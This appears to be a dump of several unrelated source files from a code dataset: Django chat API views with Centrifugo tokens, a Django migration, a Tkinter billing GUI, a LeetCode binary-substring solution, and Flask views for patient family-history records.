return Response(UserSerializer(User.objects, many=True).data, status=status.HTTP_200_OK)
class AddChatMemberView(APIView):
def post(self, request, format=None):
if not request.user.is_staff:
return Response(0, status=status.HTTP_403_FORBIDDEN)
try:
chat = Chat.objects.get(id=request.data['chat'])
user = User.objects.get(id=request.data['id'])
chat.users.add(user)
msg = Message(**{
'type': 'userJoined',
'author': user,
'chat': chat
})
msg.save()
msg.read.set([request.user])
data = MessageSerializer(msg).data
centrifuge.publish("$chat-{}".format(request.data['chat']), {'data':data, 'type': 'newMessage'})
except (Chat.DoesNotExist, User.DoesNotExist) as e:
return Response("chat or user does not exist", status=status.HTTP_400_BAD_REQUEST)
return Response(True, status=status.HTTP_200_OK)
class RmChatMemberView(APIView):
def post(self, request, format=None):
if not request.user.is_staff:
return Response(0, status=status.HTTP_403_FORBIDDEN)
try:
chat = Chat.objects.get(id=request.data['chat'])
user = User.objects.get(id=request.data['id'])
chat.users.remove(user)
msg = Message(**{
'type': 'userLeft',
'author': user,
'chat': chat
})
msg.save()
msg.read.set([request.user])
data = MessageSerializer(msg).data
centrifuge.publish("$chat-{}".format(request.data['chat']), {'data':data, 'type': 'newMessage'})
except (Chat.DoesNotExist, User.DoesNotExist) as e:
return Response("chat or user does not exist", status=status.HTTP_400_BAD_REQUEST)
return Response(True, status=status.HTTP_200_OK)
#
# API
#
class GetSelfView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def get(self, request, format=None):
return Response({
**UserSerializer(request.user).data,
'admin': request.user.is_staff
}, status=status.HTTP_200_OK)
class SendTextView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def post(self, request, format=None):
if not check_user_access(request, request.data['chat']):
return Response(token, status=status.HTTP_403_FORBIDDEN)
serializer = MessageSerializer(data=request.data)
if serializer.is_valid() and 'text' in serializer.validated_data:
msg = serializer.save(author=request.user, type='text')
data = MessageSerializer(msg).data
centrifuge.publish("$chat-{}".format(request.data['chat']), {'data':data, 'type': 'newMessage'})
return Response(data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SendImgView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def post(self, request, format=None):
if not check_user_access(request, request.data['chat']):
return Response(token, status=status.HTTP_403_FORBIDDEN)
serializer = MessageSerializer(data=request.data)
if serializer.is_valid() and 'img' in serializer.validated_data:
msg = serializer.save(author=request.user, type='img')
data = MessageSerializer(data=msg.data).data
centrifuge.publish("$chat-{}".format(request.data['chat']), {'data':data, 'type': 'newMessage'})
return Response(data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SendStickerView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def post(self, request, format=None):
if not check_user_access(request, request.data['chat']):
return Response(token, status=status.HTTP_403_FORBIDDEN)
serializer = MessageSerializer(data=request.data)
if serializer.is_valid() and 'img' in serializer.validated_data and not 'text' in serializer.validated_data:
msg = serializer.save(author=request.user, type='sticker')
data = MessageSerializer(data=msg.data).data
centrifuge.publish("$chat-{}".format(request.data['chat']), {'data':data, 'type': 'newMessage'})
return Response(data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class GetChatsView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def get(self, request, format=None):
chats = request.user.chat_set.all()
if request.user.is_staff:
chats = Chat.objects;
chats_serialized = ChatSerializer(chats, many=True, read_only=True)
return Response(chats_serialized.data, status=status.HTTP_200_OK)
class GetChatHistoryView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def post(self, request, format=None):
if not request.user.is_staff and not check_user_access(request, request.data['id']):
return Response("not a member", status=status.HTTP_403_FORBIDDEN)
chat = Chat.objects.get(id=request.data['id'])
messages = chat.message_set
paginator = CursorSetPagination()
result_page = paginator.paginate_queryset(messages, request)
serializer = MessageSerializer(result_page, many=True, read_only=True)
return Response(serializer.data, status=status.HTTP_200_OK)
class GetSubscriptionView(APIView):
authentication_classes = [CsrfExemptSessionAuthentication]
def post(self, request, format=None):
clientId = request.data['client']
chats = request.data['channels'] # $chat-{id}
results = []
for chat in chats:
chatId = int(chat.split('-')[-1])
if not check_user_access(request, chatId):
return Response(token, status=status.HTTP_403_FORBIDDEN)
token = jwt.encode({
"client": clientId,
"channel": "$chat-{}".format(chatId)
}, cf['secret'], algorithm="HS256").decode()
results.append({
"channel": chat,
"token": token
})
return Response({"channels": results}, status=status.HTTP_200_OK)
class MarkAsReadView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def post(self, request, format=None):
if not check_user_access(request, request.data['chat']):
return Response(token, status=status.HTTP_403_FORBIDDEN)
print(request.data)
messages = Chat.objects.get(id=request.data['chat']).message_set.filter(id__lte=request.data['id'])
request.user.chat_message_readby.add(*messages)
centrifuge.publish("$chat-{}".format(request.data['chat']), {
'data': {
'ids': list((message.id for message in messages)),
'by': UserSerializer(request.user).data,
},
'type': 'readMessage'
})
return Response(len(messages), status=status.HTTP_200_OK)
class GetCentrifugoTokenView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def get(self, request, format=None):
token = jwt.encode({"sub": str(request.user.id)}, cf['secret']).decode()
return Response(token, status=status.HTTP_200_OK)
|
24,687 | 68fe332076c2aa01ae7596cd88bc23fabf5de2cf | # Generated by Django 2.0.3 on 2018-04-10 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myApp', '0011_auto_20180410_0741'),
]
operations = [
migrations.AlterField(
model_name='user',
name='sex',
field=models.TextField(default='', max_length=4),
),
]
|
24,688 | fc0e1ff0bfbdc8ff7033489c55fb3687e91c20e9 | from tkinter import *
import math, random, os
from tkinter import messagebox
class Bill_App:
def __init__(self, root):
self.root = root
self.root.geometry("1350x700+0+0")
self.root.title("Billing Software")
bd_color = "#074463"
title = Label(self.root, text="Billing Software", bd=10, relief=GROOVE, bg=bd_color, fg="white",
font=("times new roman", 30, "bold"), pady=2).pack(fill=X)
# ========veriable===============================
# ========Cosmetics==============================
self.soap = IntVar()
self.face_cream = IntVar()
self.face_wash = IntVar()
self.spray = IntVar()
self.gell = IntVar()
self.loshan = IntVar()
# =========Grocery================================
self.rice = IntVar()
self.food_oil = IntVar()
self.daal = IntVar()
self.wheat = IntVar()
self.sugar = IntVar()
self.tea = IntVar()
# =========Cold Drinks=============================
self.maza = IntVar()
self.cock = IntVar()
self.frooti = IntVar()
self.thumbsup = IntVar()
self.limca = IntVar()
self.sprite = IntVar()
# ============Total Product Price & Tax Variable
self.cosmetic_price = StringVar()
self.grocery_price = StringVar()
self.cold_drink_price = StringVar()
self.cosmetic_tax = StringVar()
self.grocery_tax = StringVar()
self.cold_drink_tax = StringVar()
# =========Customes==================================
self.c_name = StringVar()
self.c_phon = StringVar()
self.bill_no = StringVar()
x = random.randint(1000, 9999)
self.bill_no.set(str(x))
self.search_bill = StringVar()
# ===============Customer Detail frame================
F1 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Customer Details", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F1.place(x=0, y=80, relwidth=1)
cname_lbl = Label(F1, text="Customer Name ", bg=bd_color, fg="white",
font=("times new roman", 18, "bold")).grid(row=0, column=0, padx=20, pady=5)
cname_text = Entry(F1, width=13, font="arial 15", textvariable=self.c_name, bd=7, relief=SUNKEN).grid(row=0,
column=1,
pady=5,
padx=10)
cphn_lbl = Label(F1, text="Customer Phone No. ", bg=bd_color, fg="white",
font=("times new roman", 18, "bold")).grid(row=0, column=2, padx=20, pady=5)
cname_text = Entry(F1, width=13, font="arial 15", textvariable=self.c_phon, bd=7, relief=SUNKEN).grid(row=0,
column=3,
pady=5,
padx=10)
cbill_lbl = Label(F1, text="Bill Number ", bg=bd_color, fg="white", font=("times new roman", 18, "bold")).grid(
row=0, column=4, padx=20, pady=5)
cbill_text = Entry(F1, width=13, font="arial 15", textvariable=self.search_bill, bd=7, relief=SUNKEN).grid(
row=0, column=5, pady=5, padx=10)
bill_btn = Button(F1, text="Search",command=self.find_bill(), width=10, bd=7, font="arial 12 bold").grid(row=0, column=6, pady=10,
padx=10)
# ================Cosmetics Frame============
F2 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Baby Care ", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F2.place(x=5, y=180, width=320, height=380)
bath_lbl = Label(F2, text="Bath Soap", font=("times new roman", 16, "bold"), bg=bd_color, fg="lightgreen").grid(
row=0, column=0, padx=10, pady=10, sticky="w")
bath_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.soap, bd=6,
relief=SUNKEN).grid(row=0, column=1, padx=10, pady=10)
Face_cream_lbl = Label(F2, text="Face Creem", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=1, column=0, padx=10, pady=10, sticky="w")
Face_cream_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.face_cream, bd=6,
relief=SUNKEN).grid(row=1,
column=1, padx=10, pady=10)
Face_w_lbl = Label(F2, text="Face wash", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=2, column=0,
padx=10, pady=10, sticky="w")
Face_w_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.face_wash, bd=6,
relief=SUNKEN).grid(row=2,
column=1, padx=10, pady=10)
Hair_s_lbl = Label(F2, text="Hair Spray", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=3, column=0, padx=10, pady=10, sticky="w")
Hair_s_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.spray, bd=6,
relief=SUNKEN).grid(row=3, column=1,
padx=10, pady=10)
Hair_g_lbl = Label(F2, text="Hair Gell", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=4, column=0, padx=10, pady=10, sticky="w")
Hair_g_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), bd=6, textvariable=self.gell,
relief=SUNKEN).grid(row=4, column=1,
padx=10, pady=10)
Body_lbl = Label(F2, text="Body Loshan", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=5, column=0, padx=10, pady=10, sticky="w")
Body_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.loshan, bd=6,
relief=SUNKEN).grid(row=5, column=1,
padx=10, pady=10)
# ================Grocery Frame============
F3 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Beer ", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F3.place(x=340, y=180, width=320, height=380)
g1_lbl = Label(F3, text="Rice", font=("times new roman", 16, "bold"), bg=bd_color, fg="lightgreen").grid(
row=0, column=0, padx=10, pady=10, sticky="w")
g1_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.rice, bd=6,
relief=SUNKEN).grid(row=0, column=1,
padx=10, pady=10)
g2_lbl = Label(F3, text="Food Oil", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=1, column=0, padx=10, pady=10, sticky="w")
g2_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.food_oil, bd=6,
relief=SUNKEN).grid(row=1,
column=1, padx=10, pady=10)
g3_lbl = Label(F3, text="Daal", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=2, column=0, padx=10, pady=10, sticky="w")
g3_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.daal, bd=6,
relief=SUNKEN).grid(row=2,
column=1, padx=10, pady=10)
g4_lbl = Label(F3, text="Wheat", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=3, column=0, padx=10, pady=10, sticky="w")
g4_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.wheat, bd=6,
relief=SUNKEN).grid(row=3,
column=1, padx=10, pady=10)
g5_lbl = Label(F3, text="Sugar", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=4, column=0, padx=10, pady=10, sticky="w")
g5_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.sugar, bd=6,
relief=SUNKEN).grid(row=4,
column=1, padx=10, pady=10)
g6_lbl = Label(F3, text="Tea", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=5, column=0, padx=10, pady=10, sticky="w")
g6_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), bd=6, textvariable=self.tea,
relief=SUNKEN).grid(row=5, column=1,
padx=10, pady=10)
# ================Cold Drink Frame============
F4 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Cold Drinks", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F4.place(x=670, y=180, width=320, height=380)
c1_lbl = Label(F4, text="Coca-Cola", font=("times new roman", 16, "bold"), bg=bd_color, fg="lightgreen").grid(
row=0, column=0, padx=10, pady=10, sticky="w")
c1_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.maza, bd=6,
relief=SUNKEN).grid(row=0, column=1,
padx=10, pady=10)
c2_lbl = Label(F4, text="Red Bull", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=1, column=0, padx=10, pady=10, sticky="w")
c2_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.cock, bd=6,
relief=SUNKEN).grid(row=1,
column=1, padx=10, pady=10)
c3_lbl = Label(F4, text="Pepsi", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=2, column=0, padx=10, pady=10, sticky="w")
c3txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.frooti, bd=6,
relief=SUNKEN).grid(row=2,
column=1, padx=10, pady=10)
c4_lbl = Label(F4, text="Nescafé ", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=3, column=0, padx=10, pady=10, sticky="w")
c4_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.thumbsup, bd=6,
relief=SUNKEN).grid(row=3, column=1, padx=10, pady=10)
c5_lbl = Label(F4, text="Sprit", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=4, column=0, padx=10, pady=10, sticky="w")
c5_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.limca, bd=6,
relief=SUNKEN).grid(row=4, column=1, padx=10, pady=10)
c6_lbl = Label(F4, text="Fanta ", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=5, column=0, padx=10, pady=10, sticky="w")
c6_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), bd=6, textvariable=self.sprite,
relief=SUNKEN).grid(row=5, column=1,
padx=10, pady=10)
# ===============Bill Area========================
F5 = Frame(self.root, bd=10, relief=GROOVE)
F5.place(x=1000, y=180, width=345, height=380)
bill_title = Label(F5, text="Bill Area", font="arial 15 bold", bd=7, relief=GROOVE).pack(fill=X)
scrol_y = Scrollbar(F5, orient=VERTICAL)
self.txtarea = Text(F5, yscrollcommand=scrol_y.set)
scrol_y.pack(side=RIGHT, fill=Y)
scrol_y.config(command=self.txtarea.yview)
self.txtarea.pack(fill=BOTH, expand=1)
# ===============Button Frame=============
F6 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Bill Menu", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F6.place(x=0, y=560, relwidth=1, height=140)
m1_lbl = Label(F6, text="Total Cosmetic Price", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=0, column=0, padx=20, pady=1, sticky="w")
m1_txt = Entry(F6, width=18, textvariable=self.cosmetic_price, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=0, column=1, padx=10, pady=1)
m2_lbl = Label(F6, text="Total Grocety Price", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=1, column=0, padx=20, pady=1, sticky="w")
m2_txt = Entry(F6, width=18, textvariable=self.grocery_price, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=1, column=1, padx=10, pady=1)
m3_lbl = Label(F6, text="Total cold Drinks Price", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=2, column=0, padx=20, pady=1, sticky="w")
m3_txt = Entry(F6, width=18, textvariable=self.cold_drink_price, font="arial 10 bold", bd=7,
relief=SUNKEN).grid(row=2, column=1, padx=10, pady=1)
c1_lbl = Label(F6, text="Cosmetics Tax", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=0, column=2, padx=20, pady=1, sticky="w")
c1_txt = Entry(F6, width=18, textvariable=self.cosmetic_tax, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=0, column=3, padx=10, pady=1)
c2_lbl = Label(F6, text="Grocery Tax", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=1, column=2, padx=20, pady=1, sticky="w")
c2_txt = Entry(F6, width=18, textvariable=self.grocery_tax, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=1, column=3, padx=10, pady=1)
c3_lbl = Label(F6, text="Cold Drinks Tax", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=2, column=2, padx=20, pady=1, sticky="w")
c3_txt = Entry(F6, width=18, textvariable=self.cold_drink_tax, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=2, column=3, padx=10, pady=1)
btn_F = Frame(F6, bd=7, relief=GROOVE)
btn_F.place(x=750, width=580, height=105)
total_btn = Button(btn_F, command=self.total, text="Total", bg="cadetblue", fg="white", pady=15, bd=2, width=10,
font="arial 15 bold").grid(row=0, column=0, padx=5, pady=5)
GBill_btn = Button(btn_F, command=self.bill_area, text="Generate Bill", bg="cadetblue", fg="white", pady=15,
bd=2, width=10, font="arial 15 bold").grid(row=0, column=1, padx=5, pady=5)
Clear_btn = Button(btn_F, text="Clear", command=self.clear_data,bg="cadetblue", fg="white", pady=15, bd=2, width=10,
font="arial 15 bold").grid(row=0, column=3, padx=5, pady=5)
Exit_btn = Button(btn_F, text="Exit",command=self.Exit_app, bg="cadetblue", fg="white", pady=15, bd=2, width=10,
font="arial 15 bold").grid(row=0, column=4, padx=5, pady=5)
self.welcome_bill()
def total(self):
self.c_s_p = self.soap.get() * 40.5
self.c_fc_p = self.face_cream.get() * 120
self.c_fw_p = self.face_wash.get() * 60
self.c_hs_p = self.spray.get() * 180
self.c_hg_p = self.gell.get() * 140
self.c_bl_p = self.loshan.get() * 180
self.total_cosmetic_price = float(
self.c_s_p + self.c_fc_p + self.c_fw_p + self.c_hs_p + self.c_hg_p + self.c_bl_p)
self.cosmetic_price.set("Tk. " + str(self.total_cosmetic_price))
self.c_tax=round(self.total_cosmetic_price * 0.15)
self.cosmetic_tax.set("Tk. " + str(self.c_tax))
self.g_r_p = self.rice.get() * 50
self.g_f_p = self.food_oil.get() * 100
self.g_d_p = self.daal.get() * 80
self.g_w_p = self.wheat.get() * 240
self.g_s_p = self.sugar.get() * 60
self.g_t_p = self.tea.get() * 150
self.total_Grocery_price = float(
self.g_r_p + self.g_f_p + self.g_d_p + self.g_w_p + self.g_s_p + self.g_t_p)
self.grocery_price.set("Tk. " + str(self.total_Grocery_price))
self.g_tax=round(self.total_Grocery_price * 0.15)
self.grocery_tax.set("Tk. " + str(self.g_tax))
self.d_m_p = self.maza.get() * 60
self.d_c_p = self.cock.get() * 80
self.d_f_p = self.frooti.get() * 70
self.d_t_p = self.thumbsup.get() * 80
self.d_l_p = self.limca.get() * 140
self.d_s_p = self.sprite.get() * 80
self.total_drinks_price = float(self.d_m_p + self.d_c_p + self.d_f_p + self.d_t_p + self.d_l_p + self.d_s_p)
self.cold_drink_price.set("Tk. " + str(self.total_drinks_price))
self.d_tax=round(self.total_drinks_price * 0.15)
self.cold_drink_tax.set("Tk. " + str(self.d_tax))
self.total_bill=float(self.total_cosmetic_price+
self.total_Grocery_price+
self.total_drinks_price+
self.c_tax+
self.g_tax+
self.d_tax )
def welcome_bill(self):
self.txtarea.delete('1.0', END)
self.txtarea.insert(END, "\tWelcome webcode Reatil\n")
self.txtarea.insert(END, f"\n Bill Number : {self.bill_no.get()}")
self.txtarea.insert(END, f"\nCustomer Name : {self.c_name.get()}")
self.txtarea.insert(END, f"\nPhone Number : {self.c_phon.get()}")
self.txtarea.insert(END, f"\n======================================")
self.txtarea.insert(END, f"\nProducts\t\tQTY\t\tPrice")
self.txtarea.insert(END, f"\n======================================")
def bill_area(self):
if self.c_name.get()=="" or self.c_phon.get()=="":
messagebox.showerror("Error ", "Customer details are must")
elif self.cosmetic_price.get()==" Tk. 0.0" and self.grocery_price.get()==" Tk. 0.0" and self.cold_drink_price.get()=="Tk. 0.0":
messagebox.showerror("Error","No Product Selected")
else:
self.welcome_bill()
# =======Cosmetics=====================
if self.soap.get() != 0:
self.txtarea.insert(END, f"\n Bath Soap\t\t{self.soap.get()}\t\t{self.c_s_p}")
if self.face_cream.get() != 0:
self.txtarea.insert(END, f"\n Face Cream\t\t{self.face_cream.get()}\t\t{self.c_fc_p}")
if self.face_wash.get() != 0:
self.txtarea.insert(END, f"\n Face Wash\t\t{self.face_wash.get()}\t\t{self.c_fw_p}")
if self.spray.get() != 0:
self.txtarea.insert(END, f"\n Hair Spray\t\t{self.spray.get()}\t\t{self.c_hs_p}")
if self.gell.get() != 0:
self.txtarea.insert(END, f"\n Gell\t\t{self.gell.get()}\t\t{self.c_hg_p}")
if self.loshan.get() != 0:
self.txtarea.insert(END, f"\n Loshan\t\t{self.loshan.get()}\t\t{self.c_s_p}")
# =============Grocery========================
if self.rice.get() != 0:
self.txtarea.insert(END, f"\n Rice\t\t{self.rice.get()}\t\t{self.g_r_p}")
if self.food_oil.get() != 0:
self.txtarea.insert(END, f"\n Food Oil\t\t{self.food_oil.get()}\t\t{self.g_f_p}")
if self.daal.get() != 0:
self.txtarea.insert(END, f"\n Daal\t\t{self.daal.get()}\t\t{self.g_d_p}")
if self.wheat.get() != 0:
self.txtarea.insert(END, f"\n Wheat\t\t{self.wheat.get()}\t\t{self.g_w_p}")
if self.sugar.get() != 0:
self.txtarea.insert(END, f"\n Sugar\t\t{self.sugar.get()}\t\t{self.g_s_p}")
if self.tea.get() != 0:
self.txtarea.insert(END, f"\n Tea\t\t{self.tea.get()}\t\t{self.g_t_p}")
# =========Cold Drinks=========================
if self.maza.get() != 0:
self.txtarea.insert(END, f"\n Coca-Cola\t\t{self.maza.get()}\t\t{self.d_m_p}")
if self.cock.get() != 0:
self.txtarea.insert(END, f"\n Red Bull\t\t{self.cock.get()}\t\t{self.d_c_p}")
if self.frooti.get() != 0:
self.txtarea.insert(END, f"\n Pepsi\t\t{self.frooti.get()}\t\t{self.d_f_p}")
if self.thumbsup.get() != 0:
self.txtarea.insert(END, f"\n Nescafe\t\t{self.thumbsup.get()}\t\t{self.d_t_p}")
if self.limca.get() != 0:
self.txtarea.insert(END, f"\nSprite \t\t{self.limca.get()}\t\t{self.d_l_p}")
if self.sprite.get() != 0:
self.txtarea.insert(END, f"\n Fanta\t\t{self.sprite.get()}\t\t{self.d_s_p}")
self.txtarea.insert(END, f"\n--------------------------------------")
if self.cosmetic_tax.get() != "Tk. 0.0":
self.txtarea.insert(END, f"\n Cosmetic Tax\t\t\t\t{self.cosmetic_tax.get()}")
if self.grocery_tax.get() != "Tk. 0.0":
self.txtarea.insert(END, f"\n Cosmetic Tax\t\t\t\t{self.grocery_tax.get()}")
if self.cold_drink_tax.get() != "Tk. 0.0":
self.txtarea.insert(END, f"\n Cosmetic Tax\t\t\t\t{self.cold_drink_tax.get()}")
self.txtarea.insert(END, f"\n--------------------------------------")
self.txtarea.insert(END, f"\n Total Bill : \t\t\t Tk. {self.total_bill}")
self.txtarea.insert(END, f"\n--------------------------------------")
self.save_bill()
def save_bill(self):
op=messagebox.askyesno("Save Bill ", "Do U want to save the Bill?")
if op>0:
self.bill_data=self.txtarea.get('1.0',END)
f1=open("bills/"+str(self.bill_no.get())+".txt","w")
f1.write(self.bill_data)
f1.close()
messagebox.showinfo("Saved",f"Bill no. :{self.bill_no.get()}" "\tBill saved Successfully")
else:
return
def find_bill(self):
present="no"
for i in os.listdir("bills/"):
if i.split('.')[0]==self.search_bill.get():
f1=open(f"bills/{i}","r")
self.txtarea.delete('1.0',END)
for d in f1:
self.txtarea.insert(END,f1)
f1.close()
present="yes"
#if present=="no":
# messagebox.showerror("Eroor","Invalid Bill No. ")
def clear_data(self):
op=messagebox.askyesno("Clear","Do u really want to clear?")
if op>0:
# ========Cosmetics==============================
self.soap.set(0)
self.face_cream.set(0)
self.face_wash.set(0)
self.spray.set(0)
self.gell.set(0)
self.loshan .set(0)
# =========Grocery================================
self.rice.set(0)
self.food_oil.set(0)
self.daal .set(0)
self.wheat .set(0)
self.sugar .set(0)
self.tea .set(0)
# =========Cold Drinks=============================
self.maza .set(0)
self.cock .set(0)
self.frooti .set(0)
self.thumbsup .set(0)
self.limca .set(0)
self.sprite .set(0)
# ============Total Product Price & Tax Variable
self.cosmetic_price .set("")
self.grocery_price .set("")
self.cold_drink_price .set("")
self.cosmetic_tax .set("")
self.grocery_tax .set("")
self.cold_drink_tax .set("")
# =========Customes==================================
self.c_name .set("")
self.c_phon .set("")
self.bill_no .set("")
x = random.randint(1000, 9999)
self.bill_no.set(str(x))
self.search_bill.set("")
self.welcome_bill()
def Exit_app(self):
op=messagebox.askyesno("Exit","Do U really want to exit?")
if op>0:
self.root.destroy()
root = Tk()
obj = Bill_App(root)
root.mainloop()
|
24,689 | d976b6b2e211b8c7f3707fc3ecd7107d3af41692 | # 方法一:蛮力法。
"""
先计算前面连续字符的长度,随后计算后面连续字符的长度
"""
class Solution:
def countBinarySubstrings(self, s):
result = 0
for i in range(len(s)):
first_length = 0
second_length = 0
j = i
while j < len(s) and s[j] == s[i]:
first_length += 1
j += 1
while j < len(s) and s[j] != s[i]:
second_length += 1
j += 1
if first_length == second_length:
result += 1
break
return result
# s = Solution()
# print(s.countBinarySubstrings('00001111'))
# 方法二:方法一其实还没用到问题背后的规律,本方法参考LeetCode他人评论
"""
先统计连续的0和1分别有多少个,如:111100011000,得到4323;在4323中的任意相邻两个数字,
取小的一个加起来,就是3+2+2 = 7.
"""
class Solution2:
def countBinarySubstrings(self, s):
candidate = []
max_len = 1
for i in range(1, len(s)):
if s[i] == s[i - 1]:
max_len += 1
else:
candidate.append(max_len)
max_len = 1
candidate.append(max_len)
result = 0
for j in range(len(candidate) - 1):
result += min(candidate[j], candidate[j + 1])
return result
s = Solution2()
print(s.countBinarySubstrings('111100011000'))
|
24,690 | d2f15e562727c1bac7409ea1d59ae0ef8d4455ae | # app/historia_clinica/antecedentes_familiares/views.py
from flask import Flask, render_template, flash, request, url_for, redirect
from . import antecedentes_familiares
from ... import db
from ...paciente.views import get_paciente
from ...models import Antecedentes_familiares
app = Flask(__name__)
## FUNCION - OBTENER LOS ANTECEDENTES FAMILIARES DE UN PACIENTE EN PARTICULAR
def get_antecedentes_familiares(id):
result = Antecedentes_familiares.query.filter_by(paciente_id=id).first()
return result
## FUNCION - CREAR UNA INSTANCIA DE LOS ANTECEDENTES FAMILIARES DE UN PACIENTE
def create_antecedentes_familiares(diabetes,cardiaca,hipertension,sobrepeso,acv,cancer,observaciones,otro_tca,paciente_id):
result = Antecedentes_familiares(
diabetes=diabetes,
cardiaca=cardiaca,
hipertension=hipertension,
sobrepeso=sobrepeso,
acv=acv,
cancer=cancer,
observaciones=observaciones,
otro_tca=otro_tca,
paciente_id=paciente_id
)
db.session.add(result)
db.session.commit()
return result
## VISTAS - COMPLETAR LOS ANTECEDENTES FAMILIARES DE UN PACIENTE ##
@antecedentes_familiares.route('/antecedentes_familiares', methods=['GET', 'POST'])
def nuevo_antecedentes_familiares():
if request.method == 'POST':
antecedentes_familiares = create_antecedentes_familiares(
request.form['diabetes'],
request.form['cardiaca'],
request.form['hipertension'],
request.form['sobrepeso'],
request.form['acv'],
request.form['cancer'],
request.form['observaciones'],
request.form['otro_tca'],
request.form['id']
)
id_paciente = request.form['id']
nombre_paciente = request.form['nombre_paciente']
flash('Has agregado los antecedentes familiares de '+nombre_paciente+' de manera exitosa.')
return render_template('historia_clinica/frecuencia_alimentos.html', id=id_paciente, nombre_paciente=nombre_paciente, title="Historia clinica")
return render_template('historia_clinica/antecedentes_familiares.html', title='Antecedentes familiares')
## VISTAS - EDITAR LOS ANTECEDENTES FAMILIARES DE UN PACIENTE ##
@antecedentes_familiares.route('/edit_antecedentes_familiares/<int:id>', methods=['GET', 'POST'])
def edit_antecedentes_familiares(id):
antecedentes_familiares = Antecedentes_familiares.query.filter_by(paciente_id=id).first()
if request.method == 'POST':
update_antecedentes_familiares = Antecedentes_familiares.query.filter_by(paciente_id=id).first()
if update_antecedentes_familiares == None:
new_antecedentes_familiares = create_antecedentes_familiares(
request.form['diabetes'],
request.form['cardiaca'],
request.form['hipertension'],
request.form['sobrepeso'],
request.form['acv'],
request.form['cancer'],
request.form['observaciones'],
request.form['otro_tca'],
id
)
flash('Has editado los antecedentes familiares del paciente con éxito.')
return redirect(url_for('ver_historia_clinica', id=id))
else:
update_antecedentes_familiares.diabetes = request.form['diabetes']
update_antecedentes_familiares.cardiaca = request.form['cardiaca']
update_antecedentes_familiares.hipertension = request.form['hipertension']
update_antecedentes_familiares.sobrepeso = request.form['sobrepeso']
update_antecedentes_familiares.acv = request.form['acv']
update_antecedentes_familiares.cancer = request.form['cancer']
update_antecedentes_familiares.observaciones = request.form['observaciones']
update_antecedentes_familiares.otro_tca = request.form['otro_tca']
update_antecedentes_familiares.paciente_id = id
db.session.commit()
flash('Has editado los antecedentes familiares del paciente con éxito.')
return redirect(url_for('historia_clinica.ver_historia_clinica', id=id))
paciente = get_paciente(id)
